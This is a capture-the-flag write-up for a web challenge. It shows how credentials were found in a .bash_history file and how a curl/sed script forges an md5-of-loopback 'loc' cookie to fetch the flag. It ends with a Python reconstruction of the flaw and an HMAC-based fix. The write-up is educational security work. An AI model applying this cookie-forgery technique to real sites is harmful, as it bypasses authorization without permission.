A guessing game; typical web challenge.
First, you must guess the username and password of test:test. There may have been another way to get this, but I found it by digging through the .bash_history file on the explicit challenge server.
The next part was fiddling with a cookie that gets set after logging in.
The loc cookie is the md5 hash of an IP address that gets used by the authentication algorithm. By guessing that the cookie's value should be changed to the md5 hash of '127.0.0.1', you win permission to download flag.txt.
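    #!/bin/sh
    # Log in as test:test and save the session cookies (including loc).
    curl -k https://ctf.noconname.org/webster/login.php -c cookies.txt --data "username=test&password=test"
    # md5('127.0.0.1') => f528764d624db129b32c21fbca0cb8d6
    # Swap the loc value set at login for the hash of the loopback address.
    sed 's/c869d000ef5c6fdfa128b058d2865512/f528764d624db129b32c21fbca0cb8d6/g' cookies.txt > good_cookies.txt
    # Request the flag with the modified cookie (URL quoted so the shell leaves '?' alone).
    curl -k "https://ctf.noconname.org/webster/content.php?op=4" -b good_cookies.txt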
    $ ./webster.sh
    NCN_f528764d624db129b32c21fbca0cb8d6
    $
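Why the cookie swap works, and what a server-side fix looks like, as an added example that is not part of the original write-up or the challenge's own code. The check in vulnerable_is_local is a hypothetical reconstruction of the behaviour described above; SERVER_KEY, the function names and the client address are assumptions made for illustration.

```python
import hashlib
import hmac
import ipaddress

SERVER_KEY = b"constructed-demo-key"  # assumption: secret known only to the server


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def vulnerable_is_local(cookies):
    # Hypothetical reconstruction of the flaw: the decision rests on a value
    # the client stores and can overwrite, and md5 of an IP needs no secret.
    return cookies.get("loc") == md5_hex("127.0.0.1")


def issue_loc(peer_ip):
    # Hardened cookie: HMAC-SHA256 of the peer address under the server key.
    return hmac.new(SERVER_KEY, peer_ip.encode(), hashlib.sha256).hexdigest()


def hardened_is_local(cookies, peer_ip):
    # Decide from the connection's peer address, never from the cookie alone;
    # the cookie must also be one the server issued for that same address.
    if not ipaddress.ip_address(peer_ip).is_loopback:
        return False
    return hmac.compare_digest(cookies.get("loc", ""), issue_loc(peer_ip))


def demo():
    remote = "203.0.113.7"  # constructed client address (documentation range)
    honest = {"loc": md5_hex(remote)}        # assumed value set at login
    forged = {"loc": md5_hex("127.0.0.1")}   # value swapped in by the script
    return {
        "vulnerable_honest": vulnerable_is_local(honest),
        "vulnerable_forged": vulnerable_is_local(forged),
        "hardened_forged_remote": hardened_is_local(forged, remote),
        "hardened_forged_loopback": hardened_is_local(forged, "127.0.0.1"),
        "hardened_issued_loopback": hardened_is_local(
            {"loc": issue_loc("127.0.0.1")}, "127.0.0.1"),
    }


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name}: {allowed}")
```

The forged cookie passes only the vulnerable check; the hardened check rejects it whether the request arrives from a remote peer or from loopback, because the client cannot compute the HMAC without the server key.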